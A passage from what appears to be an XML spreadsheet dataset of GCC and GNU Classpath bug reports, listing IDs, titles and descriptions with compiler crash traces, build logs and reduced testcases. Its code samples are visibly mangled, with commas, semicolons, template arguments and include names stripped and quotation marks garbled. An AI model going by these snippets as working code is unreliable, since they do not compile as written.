COLLECT_GCC_OPTIONS='-mmacosx-version-min=10.10.1' '-v' '-save-temps' '-o' 'test' '-shared-libgcc' '-mtune=core2'
 /usr/local/libexec/gcc/x86_64-apple-darwin14.0.0/4.9.2/f951 test.f90 -fPIC -quiet -dumpbase test.f90 -mmacosx-version-min=10.10.1 -mtune=core2 -auxbase test -version -fintrinsic-modules-path /usr/local/lib/gcc/x86_64-apple-darwin14.0.0/4.9.2/finclude -o test.s
GNU Fortran (GCC) version 4.9.2 20141029 (prerelease) (x86_64-apple-darwin14.0.0)
	compiled by GNU C version 4.9.2 20141029 (prerelease) GMP version 6.0.0 MPFR version 3.1.2-p10 MPC version 1.0.2
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU Fortran (GCC) version 4.9.2 20141029 (prerelease) (x86_64-apple-darwin14.0.0)
	compiled by GNU C version 4.9.2 20141029 (prerelease) GMP version 6.0.0 MPFR version 3.1.2-p10 MPC version 1.0.2
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
test.f90: In function â€˜bugâ€™:
test.f90:48:0: internal compiler error: in gfc_conv_component_ref at fortran/trans-expr.c:1660
       e%info =&gt; p      ! line C
 ^
test.f90:48:0: internal compiler error: Abort trap: 6
gfortran: internal compiler error: Abort trap: 6 (program f951)
Abort trap: 6
### End of Terminal output ###
Oddly enough the code compiles without error if I comment-out the call to 'NEXT' (line 42 which I've labelled line A) and uncomment lines 43-45 (which I've labelled lines B_1 B_2 and B_3) even though the 'NEXT' subroutine contains *exactly* the same content as lines 43-45.
Andre Vehreschild responded to my post on the GNU Fortran mailing list and he recommended that I add the following information:
When translating the pointer assignment in the select type the backend_decl of
the _vptr's component-ref is not initialized (== NULL) leading to the crash
experienced here. I haven't encountered something similar yet therefore I can
only guess: Something going wrong in the resolve-stage?</t>
  </si>
  <si>
    <t>GCC-81233</t>
  </si>
  <si>
    <t>--Wdiscarded-qualifiers and Wincompatible-pointer-types missing important detail</t>
  </si>
  <si>
    <t>The -Wdiscarded-qualifiers and -Wincompatible-pointer-types warnings (and possibly others like these two) point out incompatibilities in expressions involving conversions between incompatible pointer types but neglect to mention the actual types of the pointer operands or where they are declared.  For example imagine that in the program below the struct is defined in some header file far removed from the assignment that triggers the warning.  The lack of detail makes it difficult to tell what the expected types are and what the appropriate fix is.
$ cat x.c &amp;&amp; gcc -S -Wall -xc x.c
struct S { int *p char *q const char *r }
void f (struct S *s)
{
  s-&gt;p = s-&gt;q
  s-&gt;q = s-&gt;r
}
x.c: In function â€˜fâ€™:
x.c:5:8: warning: assignment from incompatible pointer type [-Wincompatible-pointer-types]
   s-&gt;p = s-&gt;q
        ^
x.c:6:8: warning: assignment discards â€˜constâ€™ qualifier from pointer target type [-Wdiscarded-qualifiers]
   s-&gt;q = s-&gt;r
        ^
In contrast to GCC Clang issues the following messages:
t.c:5:8: warning: incompatible pointer types assigning to 'int *' from 'char *'
      [-Wincompatible-pointer-types]
  s-&gt;p = s-&gt;q
       ^ ~~~~
t.c:6:8: warning: assigning to 'char *' from 'const char *' discards qualifiers
      [-Wincompatible-pointer-types-discards-qualifiers]
  s-&gt;q = s-&gt;r
       ^ ~~~~</t>
  </si>
  <si>
    <t>GCC-29928</t>
  </si>
  <si>
    <t>typeid of unknown bound array</t>
  </si>
  <si>
    <t>g++ rejects following IMHO valid code.
int main()
{ 
  const std::type_info
  return 0
}</t>
  </si>
  <si>
    <t>GCC-13193</t>
  </si>
  <si>
    <t>[tree-ssa] Another ICE during bootstrap</t>
  </si>
  <si>
    <t>gmake[1]: Leaving directory `/home/sgk/obj/libbanshee'
gmake[1]: Entering directory `/home/sgk/obj/gcc'
/home/sgk/obj/gcc/xgcc -B/home/sgk/obj/gcc/ -B/home/sgk/i386-unknown-freebsd5.1/bin/ -B/home/sgk/i386-unknown-freebsd5.1/lib/ -isystem /home/sgk/i386-unknown-freebsd5.1/include -isystem /home/sgk/i386-unknown-freebsd5.1/sys-include -O2 -DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes  -isystem ./include  -I. -I. -I../../gcc/gcc -I../../gcc/gcc/. -I../../gcc/gcc/../include -I../intl -I../../gcc/gcc/../libbanshee/libcompat -I../../gcc/gcc/../libbanshee -I../../gcc/gcc/../libbanshee/points-to -I/usr/local/include  -g0 -finhibit-size-directive -fno-inline-functions -fno-exceptions -fno-zero-initialized-in-bss -fno-unit-at-a-time  \
   -c ../../gcc/gcc/crtstuff.c -DCRT_BEGIN \
  -o crtbegin.o
../../gcc/gcc/crtstuff.c: In function `__do_global_dtors_aux':
../../gcc/gcc/crtstuff.c:256: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
gmake[1]: *** [crtbegin.o] Error 1
gmake[1]: Leaving directory `/home/sgk/obj/gcc'
gmake: *** [all-gcc] Error 2
Environment:
System: FreeBSD troutmask.apl.washington.edu 5.1-CURRENT FreeBSD 5.1-CURRENT #1: Thu Sep 18 11:50:56 PDT 2003 kargl@troutmask.apl.washington.edu:/usr/obj/usr/src/sys/TROUTMASK i386
host: i386-unknown-freebsd5.1
build: i386-unknown-freebsd5.1
target: i386-unknown-freebsd5.1
configured with: ../gcc/configure --enable-languages=cf95 --prefix=/home/sgk --with-gmp=/usr/local --disable-libmudflap
How-To-Repeat:
 Try to bootstrap tree-ssa branch.</t>
  </si>
  <si>
    <t>GCC-26424</t>
  </si>
  <si>
    <t>tr1/unordered vs 64-bit machines</t>
  </si>
  <si>
    <t>The number of buckets is currently limited to ~2^32 (see X::primes). This is a serious issue: for correctness rehash(n) for n &gt; 2^32 should throw and do nothing in order not to violate the post-conditions in Table 21.
We have various options: as suggested by Howard off-line we could well compute at run-time prime-numbers. Otherwise mid-term if we cannot extend the maximum number of bucket we have to add throws to the rehashing functions.</t>
  </si>
  <si>
    <t>GCC-1531</t>
  </si>
  <si>
    <t>libstdc++ is broken for -fno-exceptions</t>
  </si>
  <si>
    <t xml:space="preserve">	The compiler complains about a catch() statement in the standard
	header files when -fno-exceptions is turned on.
Release:
2.97 20001230 (experimental)
Environment:
System: Linux bessie 2.4.0-test12 #1 Thu Dec 14 22:47:50 EST 2000 i586 unknown
Architecture: i586
host: i586-pc-linux-gnu
build: i586-pc-linux-gnu
target: i586-pc-linux-gnu
configured with: ../gcc/configure --prefix=/usr/local/home/jlnance/gcctemp --enable-languages=cc++
How-To-Repeat:
	/usr/local/home/jlnance/gcctemp/bin/g++ -o regxpcom.o -c -fPIC -fno-rtti -fno-exceptions -fshort-wchar -pthread -O4 -g regxpcom.ii
See attachments for regxpcom.ii
</t>
  </si>
  <si>
    <t>jlnance</t>
  </si>
  <si>
    <t>GCC-14667</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE in cp_parser_parse_and_diagnose_invalid_type_name</t>
  </si>
  <si>
    <t>With current mainline GCC (gcc version 3.5.0 20040319) crash at 
invalide sourcecode:
Test.cc:7: internal compiler error: in 
cp_parser_parse_and_diagnose_invalid_type_name at cp/parser.c:2060
Please submit a full bug report
--8X---------------------
template
class Class1
class Class2 {
}  // no 
typedef Class1 Type1
--X8---------------------
Giovanni Bajo in PR14283 comment:
wanderer: this is a totally unrelated bug even if the ICE happens at the 
same 
place. Would you please file a new bugreport to track it? Thanks.
And i create this bugreport.</t>
  </si>
  <si>
    <t>GCC-83940</t>
  </si>
  <si>
    <t>[8 Regression] ICE in vect_get_vec_def_for_stmt_copy at tree-vect-stmts.c:1531</t>
  </si>
  <si>
    <t>Starting from r256643 we ICE on:
$ cat pr.c
double **a
int b
void c ()
{
  for ( b b++)
    a[b][b] = 1.0
}
$ gcc pr.c -mavx512vnni -Ofast
during GIMPLE pass: vect
pr.c: In function â€˜câ€™:
pr.c:3:6: internal compiler error: in vect_get_vec_def_for_stmt_copy at tree-vect-stmts.c:1531
 void c ()
      ^
0xe293cf vect_get_vec_def_for_stmt_copy(vect_def_type tree_node*)
	.././../gcc/tree-vect-stmts.c:1531
0xe38d58 vectorizable_store
	.././../gcc/tree-vect-stmts.c:6359
0xe476ac vect_transform_stmt(gimple* gimple_stmt_iterator* bool* _slp_tree* _slp_instance*)
	.././../gcc/tree-vect-stmts.c:9470
0xe55e67 vect_transform_loop(_loop_vec_info*)
	.././../gcc/tree-vect-loop.c:8842
0xe74cd3 vectorize_loops()
	.././../gcc/tree-vectorizer.c:740
Options:
 /home/marxin/BIG/buildbot/slave/install/gcc-87413c363b2dc87c08db06655fc60622176ed9b1/bin/../libexec/gcc/x86_64-pc-linux-gnu/8.0.1/cc1 -fpreprocessed pr.i -quiet -dumpbase pr.c -mavx512vnni -mtune=generic -march=x86-64 -auxbase pr -Ofast -version -o pr.s</t>
  </si>
  <si>
    <t>GCC-35255</t>
  </si>
  <si>
    <t>[DR 115] gcc does not do partial ordering on overloaded address resolution</t>
  </si>
  <si>
    <t>The following reduced testcase from PR 34950 gives an incorrect error after the crashing bug in that PR is fixed:
-----
struct default_policy {}
template 
struct policy
{
    typedef int precision_type
}
template  struct precision {
    typedef Real type
    typedef typename Policy::precision_type precision_type
}
template 
struct bessel_traits {
    typedef T1 result_type
    typedef typename precision::type precision_type
}
template 
void
def(char const* name Fn fn)
template 
typename bessel_traits::result_type
cyl_bessel_j(T1 v T2 x const Policy
template 
typename bessel_traits &gt;::result_type
cyl_bessel_j(T1 v T2 x)
void hedge_expose_polynomial()
{
    def(cyl_bessel_j cyl_bessel_j)
}
-----
We should recognize that the latter template is more specialized than the former and so the implicit address of cyl_bessel_j is unambiguous.</t>
  </si>
  <si>
    <t>GCC-17535</t>
  </si>
  <si>
    <t>[4.0 Regression] gfortran with module procedures</t>
  </si>
  <si>
    <t>My m90 math library compiled without a problem on 02 Sep 04.  A 16 Sep 04
gfortran has developed ICEs on at least 4 files.
dhcp-78-96:kargl[206] /home/sgk/bin/gfortran -c sjnm.f90
sjnm.f90:48: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-2735</t>
  </si>
  <si>
    <t>can't cast a union type defined by a typedef to itself</t>
  </si>
  <si>
    <t>GCC doesn't allow casting a  variable of a typedef'ed type that is a union type to its very own type.  It does work if no typedef is involved.
Release:
unknown
Environment:
gcc 2.7 gcc 2.95
How-To-Repeat:
gcc bug.c</t>
  </si>
  <si>
    <t>cowan</t>
  </si>
  <si>
    <t>CLASSPATH-25154</t>
  </si>
  <si>
    <t>Infinite recursion is occurred when SecurityManager is set</t>
  </si>
  <si>
    <t>When SecurityManager is set Class.getClassLoader() falls into infinite recursion.
Class.getClassLoader() -&gt; VMStackWalker.getCallingClassLoader() -&gt; Class.getClassLoader() -&gt; ...
VMStackWalker.getCallingClassLoader() calls Class.getClassLoader()
---
  public static ClassLoader getCallingClassLoader()
  {
    Class[] ctx = getClassContext()
    if (ctx.length &lt; 3)
      return null
    return ctx[2].getClassLoader()
  }
---
Class.getClassLoader() calls VMStackWalker.getCallingClass() when SecurityManager is set.
---
  public ClassLoader getClassLoader()
  {
    if (isPrimitive())
      return null
    ClassLoader loader = VMClass.getClassLoader(this)
    // Check if we may get the classloader
    SecurityManager sm = SecurityManager.current
    if (sm != null)
      {
        // Get the calling classloader
	ClassLoader cl = VMStackWalker.getCallingClassLoader()
        if (cl != null &amp;&amp; !cl.isAncestorOf(loader))
          sm.checkPermission(new RuntimePermission(getClassLoader))
      }
    return loader
  }
---</t>
  </si>
  <si>
    <t>GCC-81069</t>
  </si>
  <si>
    <t>nvptx offloading: -O1 execution test of libgomp.oacc-fortran/nested-function-1.f90 timeout/FAIL</t>
  </si>
  <si>
    <t>Merging trunk r239357 (part of the PR72772 Missed SCEV after pass reordering@236440 changes) into gomp-4-branch r240825 there is a regression with nvptx offloading such that (only) the -O1 execution test of libgomp.oacc-fortran/nested-function-1.f90 FAILs running into a WARNING: program timed out.</t>
  </si>
  <si>
    <t>GCC-63587</t>
  </si>
  <si>
    <t>[5 Regression] ICE : tree check: expected var_decl have result_decl in add_local_variables at tree-inline.c:4112</t>
  </si>
  <si>
    <t>trippels@gcc1-power7 status % g++ -c -w -std=c++11 -O2 form_attr.ii
form_attr.ii: In static member function â€˜static int boost::function_obj_invoker0::invoke(boost::function_buffer&amp;) [with FunctionObj = boost::test_case_template_invoker]â€™:
form_attr.ii:216:66: internal compiler error: tree check: expected var_decl have result_decl in add_local_variables at tree-inline.c:4112
   make_output_actor attribute_actor &gt;::make (left right)
                                                                  ^
0x10c686af tree_check_failed(tree_node const* char const* int char const* ...)
        ../../gcc/gcc/tree.c:9185
0x10a1161f tree_check
        ../../gcc/gcc/tree.h:2733
0x10a1161f add_local_variables
        ../../gcc/gcc/tree-inline.c:4112
0x10a1c39f expand_call_inline
        ../../gcc/gcc/tree-inline.c:4389
0x10a1c39f gimple_expand_calls_inline
        ../../gcc/gcc/tree-inline.c:4518
0x10a1c39f optimize_inline_calls(tree_node*)
        ../../gcc/gcc/tree-inline.c:4659
0x10fc7acf inline_transform(cgraph_node*)
        ../../gcc/gcc/ipa-inline-transform.c:460
0x1089755f execute_one_ipa_transform_pass
        ../../gcc/gcc/passes.c:1990
0x1089755f execute_all_ipa_transforms()
        ../../gcc/gcc/passes.c:2031
0x1052cc67 cgraph_node::expand()
        ../../gcc/gcc/cgraphunit.c:1735
0x1052e957 expand_all_functions
        ../../gcc/gcc/cgraphunit.c:1878
0x1052e957 symbol_table::compile()
        ../../gcc/gcc/cgraphunit.c:2213
0x105309d3 symbol_table::finalize_compilation_unit()
        ../../gcc/gcc/cgraphunit.c:2290
0x10260d33 cp_write_global_declarations()
        ../../gcc/gcc/cp/decl2.c:4666
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
trippels@gcc1-power7 status % g++ -fno-ipa-icf -c -w -std=c++11 -O2 form_attr.ii
trippels@gcc1-power7 status %</t>
  </si>
  <si>
    <t>GCC-1774</t>
  </si>
  <si>
    <t>parse error with method template of class template</t>
  </si>
  <si>
    <t>g++ gets a parse error for valid code under the following
set of precise conditions:
1) a method template is defined in a templated base class
2) a class template derives from the base class the base
class being given the same template parameters as specified
for the derived class i.e.:
template 
class Test : public TestBase
3) inside the derived class a call is made to the method
template using the func(...) syntax for choosing a
specialization i.e.: 'int sz = subsize()'
This call generates a parse error.
$ g++ -c templbug.C
templbug.C: In method `int Test::size2 () const':
templbug.C:16: parse error before `)'
Release:
gcc version 2.96 20000731 and 2.97 20010120 (experimental)
Environment:
Linux 2.2.16-22smp #1 SMP i686 unknown
and codesourcery online submission</t>
  </si>
  <si>
    <t>bgreen</t>
  </si>
  <si>
    <t>GCC-71465</t>
  </si>
  <si>
    <t>[7 Regression] ICE on invalid C++ code (with duplicate base) on x86_64-linux-gnu: in dfs_build_secondary_vptr_vtt_inits at cp/class.c:9075</t>
  </si>
  <si>
    <t>The following code causes an ICE when compiled with the current gcc trunk on x86_64-linux-gnu in both 32-bit and 64-bit modes.
This is a regression from 6.1.x. 
$ g++-trunk -v
Using built-in specs.
COLLECT_GCC=g++-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/7.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 7.0.0 20160608 (experimental) [trunk revision 237196] (GCC) 
$ 
$ g++-6.1 -c small.cpp
small.cpp:4:18: error: duplicate base type â€˜Câ€™ invalid
 struct D : C B C {}
                  ^
$  
$ g++-trunk -c small.cpp
small.cpp:4:18: error: duplicate base type â€˜Câ€™ invalid
 struct D : C B C {}
                  ^
small.cpp:4:8: internal compiler error: in dfs_build_secondary_vptr_vtt_inits at cp/class.c:9075
 struct D : C B C {}
        ^
0x74907e dfs_build_secondary_vptr_vtt_inits
        ../../gcc-source-trunk/gcc/cp/class.c:9075
0x80472e dfs_walk_all(tree_node* tree_node* (*)(tree_node* void*) tree_node* (*)(tree_node* void*) void*)
        ../../gcc-source-trunk/gcc/cp/search.c:1798
0x804774 dfs_walk_all(tree_node* tree_node* (*)(tree_node* void*) tree_node* (*)(tree_node* void*) void*)
        ../../gcc-source-trunk/gcc/cp/search.c:1810
0x804774 dfs_walk_all(tree_node* tree_node* (*)(tree_node* void*) tree_node* (*)(tree_node* void*) void*)
        ../../gcc-source-trunk/gcc/cp/search.c:1810
0x807b88 dfs_walk_once(tree_node* tree_node* (*)(tree_node* void*) tree_node* (*)(tree_node* void*) void*)
        ../../gcc-source-trunk/gcc/cp/search.c:1895
0x7492cd build_vtt_inits
        ../../gcc-source-trunk/gcc/cp/class.c:9022
0x74d216 build_vtt
        ../../gcc-source-trunk/gcc/cp/class.c:8907
0x74d216 finish_struct_1(tree_node*)
        ../../gcc-source-trunk/gcc/cp/class.c:7070
0x74edb4 finish_struct(tree_node* tree_node*)
        ../../gcc-source-trunk/gcc/cp/class.c:7265
0x78875c cp_parser_class_specifier_1
        ../../gcc-source-trunk/gcc/cp/parser.c:21368
0x78875c cp_parser_class_specifier
        ../../gcc-source-trunk/gcc/cp/parser.c:21596
0x78875c cp_parser_type_specifier
        ../../gcc-source-trunk/gcc/cp/parser.c:15836
0x79d223 cp_parser_decl_specifier_seq
        ../../gcc-source-trunk/gcc/cp/parser.c:12758
0x7aa711 cp_parser_simple_declaration
        ../../gcc-source-trunk/gcc/cp/parser.c:12299
0x7aab61 cp_parser_block_declaration
        ../../gcc-source-trunk/gcc/cp/parser.c:12246
0x7b3f40 cp_parser_declaration
        ../../gcc-source-trunk/gcc/cp/parser.c:12143
0x7b2a14 cp_parser_declaration_seq_opt
        ../../gcc-source-trunk/gcc/cp/parser.c:12022
0x7b2d48 cp_parser_translation_unit
        ../../gcc-source-trunk/gcc/cp/parser.c:4324
0x7b2d48 c_parse_file()
        ../../gcc-source-trunk/gcc/cp/parser.c:37502
0x9162f2 c_common_parse_file()
        ../../gcc-source-trunk/gcc/c-family/c-opts.c:1064
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
-------------------------------------
struct A { virtual void foo () {} }
struct B : virtual A {}
struct C : virtual A {} 
struct D : C B C {}</t>
  </si>
  <si>
    <t>GCC-13140</t>
  </si>
  <si>
    <t>declaration in global namespace definition inside named or anon namespace</t>
  </si>
  <si>
    <t>gcc accept this illegal code at least with 2.91 2.95.3 and
gcc version 3.4 20031120 (experimental) so this is not a
regression
struct foo {
  foo()
}
namespace bar {
foo::foo() { }
}
Comeau catch it at foo::foo() definition
error: overloaded function foo::foo cannot be defined in the current scope
regards
Philippe Elie</t>
  </si>
  <si>
    <t>GCC-474</t>
  </si>
  <si>
    <t>ICE on Ogg Vorbis lib/res0.c</t>
  </si>
  <si>
    <t>compiling Ogg Vorbis libs breaks with Internal Compiler Error on libs/res0.c
Release:
gcc 2.95.2 19991024
Environment:
LinuxPPC 2000 on a PowerPC G3/333
How-To-Repeat:
gcc -O20 -ffast-math -D_REENTRANT -fsigned-char -I. -I../include -DUSE_ALLOCA_H -DUSE_MEMORY_H -Dvorbis_size32='int' -c res0.c</t>
  </si>
  <si>
    <t>gamache</t>
  </si>
  <si>
    <t>GCC-57782</t>
  </si>
  <si>
    <t>Wasted work in remove_path()</t>
  </si>
  <si>
    <t>Created attachment 30423
Suggested patch
The problem appears in revision 200588 in version 4.9. I have attached a patch that fixes it.
In method remove_path() in cfgloopmanip.c the loop on line 343 should break immediately after irred_invalidated is set to true. All the iterations after irred_invalidated set to true do not perform any useful work at best they just set irred_invalidated again to true.</t>
  </si>
  <si>
    <t>GCC-67247</t>
  </si>
  <si>
    <t>ICE on std::forward args&amp;&amp; inside nested lambda function</t>
  </si>
  <si>
    <t>Code as is:
http://coliru.stacked-crooked.com/a/903e76d5446bfeb2
----------------------------------------------------------------
#include 
#include 
#include 
template 
decltype(auto) operator &gt;&gt; (F1 &amp;&amp;f1 F2 &amp;&amp;f2){
    using namespace std
    return f2(forward(f1))
}
template 
decltype(auto) operator &lt;&lt; (F1 &amp;&amp;f1 F2 &amp;&amp;f2){
    using namespace std
    return f1(forward(f2))
}
// curry 2 args pack (temporary)
#define f(...) \
    [](auto&amp;&amp; ...args1){return  \
        [}   /* &lt;-- ICE HERE!*/ \ 
    }
using namespace std
auto sum(int a int b){
    return a+b
}
auto divide(int a int b){
    return a/b
}
int main() {
    float a = 10
    float b = 20
    auto part1 =  f(divide) &lt;&lt; 5          // just for test purpose
    auto res = sum(ab) &gt;&gt; f(divide) &lt;&lt; 5
    auto res_ctrl = divide(sum(ab) 5.0)
    cout &lt;&lt; res : &lt;&lt; res &lt;&lt; endl
    cout &lt;&lt; ctrl: &lt;&lt; res_ctrl &lt;&lt; endl
    return 0
}
----------------------------------------------------------------
C:\Dropbox\C++\exp_chained_call\simple_chain.h:22:49: internal compiler error: Segmentation fault
         [}  \
Without std::forward it is ok.
With [}  ok also.
P.S. I just realize that args1 is probably stored as &amp; not &amp;&amp; inside lambda... But ICE is ICE.</t>
  </si>
  <si>
    <t>GCC-15930</t>
  </si>
  <si>
    <t>[irix6.5] gfortran libraries not built</t>
  </si>
  <si>
    <t>The gfortran testsuite cannot find -lgfortranbegin so many tests fail with
Executing on host: /disk4/billingd/obj/gcc-f/gcc/testsuite/../gfortran -
B/disk4/billingd/obj/gcc-
f/gcc/testsuite/../ /disk4/billingd/src/gcc/gcc/testsuite/gfortran.fortran-
torture/execute/a_edit_1.f90  -w  -O0   -L/disk4/billingd/obj/gcc-f/mips-sgi-
irix6.5/./libiberty  -lm   -o /disk4/billingd/obj/gcc-
f/gcc/testsuite/a_edit_1.x    (timeout = 300)
ld32: FATAL   9  : I/O error (-lgfortranbegin): No such file or directory
collect2: ld returned 32 exit status
compiler exited with status 1
output is:
I have seen this before.  I think the fix can be taken across from the g++ 
testsuite harness.  Assigned to self.</t>
  </si>
  <si>
    <t>GCC-57313</t>
  </si>
  <si>
    <t>[4.9 Regression]: gcc.dg/binop-xor3.c scan-tree-dump-times</t>
  </si>
  <si>
    <t>Created attachment 30139
binop-xor3.c.165t.optimized
This test previously passed now it fails.
A patch in the revision range (last_known_working:first_known_failing) 198890:198899
exposed or caused this regression.  Since then it fails as follows:
Running /tmp/hpautotest-gcc0/gcc/gcc/testsuite/gcc.dg/dg.exp ...
FAIL: gcc.dg/binop-xor3.c scan-tree-dump-times optimized \\^ 1
The files binop-xor3.s and binop-xor3.c.165t.optimized are attached.
Author of the most suspect patch (having touched the actual test-case and related code) in revision range CC:ed.
Apparently cris-elf is just one of many targets for which this test now fails I guess half of them regressed but x86_64 and i686 (and ia64 sh4 spu) as seen on gcc-testresults@ since then: s390-ibm-linux-gnu  m68k-unknown-linux-gnu  powerpc-ibm-aix7.1.0.0  powerpc64-unknown-linux-gnu
.</t>
  </si>
  <si>
    <t>GCC-40753</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE in refs_may_alias_p_1 for libffi/src/powerpc/ffi.c</t>
  </si>
  <si>
    <t>Compiling libffi/src/powerpc/ffi.c as part of a bootstrap for powerpc*-*-linux* fails starting with this patch:
    http://gcc.gnu.org/viewcvs?view=rev&amp;rev=149624
    r149624 | rguenth | 2009-07-14 09:59:18 +0000 (Tue 14 Jul 2009)
This minimized testcase demonstrates the problem:
--------------------------------------------------------------
typedef long unsigned int size_t
typedef struct {
  unsigned nargs
} ffi_cif
typedef struct {
  char tramp[24]
  ffi_cif *cif
} ffi_closure
extern void *memcpy (void * const void * size_t)
extern void ffi_closure_LINUX64 (void)
int
ffi_prep_closure_loc (ffi_closure *closure ffi_cif *cif)
{
  void **tramp = (void **) 
  memcpy (tramp (char *) ffi_closure_LINUX64 16)
  closure-&gt;cif = cif
  return 0
}
--------------------------------------------------------------
elm3b149% /home/janis/build/build-gcc-trunk-anonsvn/gcc/cc1 -quiet -O2 bug0714.c
bug0714.c: In function â€˜ffi_prep_closure_locâ€™:
bug0714.c:21:1: internal compiler error: in refs_may_alias_p_1 at tree-ssa-alias.c:746
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-6605</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;G++ fails to compile this simple code:
  #include 
  #include 
  namespace PIO {
   class Tmp_file
  }
  class PIO::Tmp_file : public std::fstream {}
with the command line g++ -Wall aa.cc -c.  The output is:
  /home/mpiter/bin/../include/g++-v3/bits/std_streambuf.h: In instantiation of `std::basic_streambuf &gt;':
  /home/mpiter/bin/../include/g++-v3/bits/std_fstream.h:368:   instantiated from `std::basic_filebuf &gt;'
  /home/mpiter/bin/../include/g++-v3/bits/std_fstream.h:368:   instantiated from `std::basic_fstream &gt;'
  aa.cc:8:   instantiated from here
  /home/mpiter/bin/../include/g++-v3/bits/std_streambuf.h:77: `__copy_streambufs' 
    was not declared in this scope
It seems a header file problem.
Release:
3.0.4
Environment:
System: Linux eglantier 2.4.7-10enterprise #1 SMP Thu Sep 6 16:48:20 EDT 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc-3.0.4/configure --prefix=/home/mpiter/softwares/gcc-3.0.4 --with-stabs
How-To-Repeat:
 </t>
  </si>
  <si>
    <t>mpiter</t>
  </si>
  <si>
    <t>GCC-39137</t>
  </si>
  <si>
    <t>[4.4 Regression] -mpreferred-stack-boundary=2 causes lots of dynamic realign</t>
  </si>
  <si>
    <t>On i?86 Linux kernel (or e.g. valgrind) are compiled with -Os -m32 -mpreferred-stack-boundary=2.  AFAIK this is used primarily to make generated code small.  But when compiled with gcc 4.4 lots of functions at least in valgrind (haven't checked kernel but I assume even more so there) now newly uses dynamic realignment.  Short testcase:
void foo (unsigned long long *)
int bar (void)
{
  unsigned long long l
  foo (
  return 0
}
The problem is that without -malign-double long long and double have 32-bit alignment only in aggregate fields when used standalone have for performance reasons 64-bit alignment.  When used in .data/.rodata etc. this is not a problem but when DImode/DFmode vars are automatic this means
crtl-&gt;stack_alignment_estimated is 64 and so stack is dynamically realigned which increases generated code size quite a bit and performance wise slows stuff down as well.
Could we not count DFmode/DImode vars into crtl-&gt;stack_alignment_estimated
on i386 using some target macro or at least not count them conditionally (on -Os + -mpreferred-stack-boundary=2 or perhaps based on some other option)?
I'm pretty sure the kernel people will be very unhappy about this.</t>
  </si>
  <si>
    <t>GCC-43808</t>
  </si>
  <si>
    <t>[4.6 Regression] -fipa-reference -fschedule-insns -fstrict-aliasing causes two gfortran check failures</t>
  </si>
  <si>
    <t>Tested revisions:
r158486 - fail
r158150 - fail
4.5 r158486 - OK
$ binary-158486-lto-fortran/bin/gfortran -fipa-reference -fschedule-insns -fstrict-aliasing gcc/testsuite/gfortran.dg/alloc_comp_assign_3.f90 &amp;&amp; ./a.out
Segmentation fault
$ binary-158486-lto-fortran/bin/gfortran -fipa-reference -fschedule-insns -fstrict-aliasing gcc/testsuite/gfortran.dg/alloc_comp_assign_4.f90 &amp;&amp; ./a.out
Segmentation fault</t>
  </si>
  <si>
    <t>GCC-42858</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE in gfc_array_dimen_size at ../../trunk/gcc/fortran/array.c:2063</t>
  </si>
  <si>
    <t>Between svn rev. 156083 and 156198 the following ICE started to
occur with the attached testcase:
f951: internal compiler error: Segmentation fault
Running gdb on the testcase:
(gdb) run gfcbug102.f90
Starting program: /opt/gfortran/4.5/libexec/gcc/i686-pc-linux-gnu/4.5.0/f951 gfcbug102.f90
Program received signal SIGSEGV Segmentation fault.
0x080d61f8 in gfc_array_dimen_size (array=0x8bf2380 dimen=0 result=0xbfffe868)
    at ../../trunk/gcc/fortran/array.c:2063
2063          else if (spec_dimen_size (array-&gt;symtree-&gt;n.sym-&gt;as dimen result)</t>
  </si>
  <si>
    <t>GCC-83102</t>
  </si>
  <si>
    <t>[8 Regression] go bootstrap error in ast-dump.cc due to __is_invocable failure</t>
  </si>
  <si>
    <t>Bootstrapping GCC 8.0 (at r255038) on x86_64 fails with the error while compiling gcc/go/gofrontend/ast-dump.cc:
In file included from /opt/notnfs/msebor/build/gcc-svn/prev-x86_64-pc-linux-gnu/libstdc++-v3/include/map:60
                 from /opt/notnfs/msebor/src/gcc/svn/gcc/go/go-system.h:36
                 from /opt/notnfs/msebor/src/gcc/svn/gcc/go/gofrontend/ast-dump.cc:7:
/opt/notnfs/msebor/build/gcc-svn/prev-x86_64-pc-linux-gnu/libstdc++-v3/include/bits/stl_tree.h: In instantiation of â€˜class std::_Rb_tree Import_init_lt std::allocator &gt;â€™:
/opt/notnfs/msebor/build/gcc-svn/prev-x86_64-pc-linux-gnu/libstdc++-v3/include/bits/stl_set.h:133:17:   required from â€˜class std::setâ€™
/opt/notnfs/msebor/src/gcc/svn/gcc/go/gofrontend/gogo.h:127:37:   required from here
/opt/notnfs/msebor/build/gcc-svn/prev-x86_64-pc-linux-gnu/libstdc++-v3/include/bits/stl_tree.h:452:7: error: static assertion failed: comparison object must be invocable with two arguments of key type
       static_assert(__is_invocable{}
       ^~~~~~~~~~~~~
/opt/notnfs/msebor/src/gcc/svn/gcc/go/Make-lang.in:239: recipe for target 'go/ast-dump.o' failed
A test case for the error suggests the problem is either in libstdc++ or the C++ front end:
$ cat t.C &amp;&amp; g++ -S -Wall ... t.C
#include 
struct Import_init { int init_name () const }
struct Import_init_lt {
  bool operator()(const Import_init* i1 const Import_init* i2)
  {
    return i1-&gt;init_name() init_name()
  }
}
class Import_init_set : public std::set { }
In file included from /opt/notnfs/msebor/build/gcc-svn/prev-x86_64-pc-linux-gnu/libstdc++-v3/include/set:60
                 from t.C:1:
